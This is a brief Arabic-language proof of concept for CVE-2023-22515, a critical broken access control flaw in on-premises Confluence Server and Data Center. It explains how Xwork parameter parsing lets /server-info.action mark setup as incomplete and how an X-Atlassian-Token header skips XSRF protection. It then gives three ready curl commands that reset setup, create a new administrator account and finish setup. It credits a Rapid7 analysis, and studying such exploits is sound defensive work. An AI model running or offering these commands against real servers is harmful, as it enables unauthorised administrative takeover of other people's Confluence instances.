
Poc لـ CVE-2023-22515
CVE-2023-22515، ثغرة أمنية حرجة تؤثر على الإصدارات المحلية من Confluence Server وConfluence Data Center، وهي ثغرة في التحكم في الوصول المكسور. قدمت Atlassian درجة أساسية من CVSS تبلغ 10.0
1- نظرًا لكيفية قيام معترضات Xwork بتحليل المعاملات /test.action?one=a يساوي setOne()='a' وبدلاً من ذلك /test.action?one.two=a يساوي getOne().setTwo()="a"
2- تشمل نقاط النهاية /setup/* استدعاء @ParameterSafe والذي يسمح لنا باستخدام set و get مثل /setup/setupdb.action?dbConfigInfo.databaseType=postgresql، ولكن نظرًا لأن نقاط النهاية /setup/* محظورة لأن الإعداد مكتمل، يمكن استخدام /server-info.action
3- ابحث عن طريقة set لإكمال الإعداد => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- استخدم رأس "X-Atlassian-Token" لتجاوز XSRF
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
إخلاء مسؤولية: لم يتم اكتشاف أو صنع الاستغلال بواسطتي، يعود الفضل للمقالات أدناه.
https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis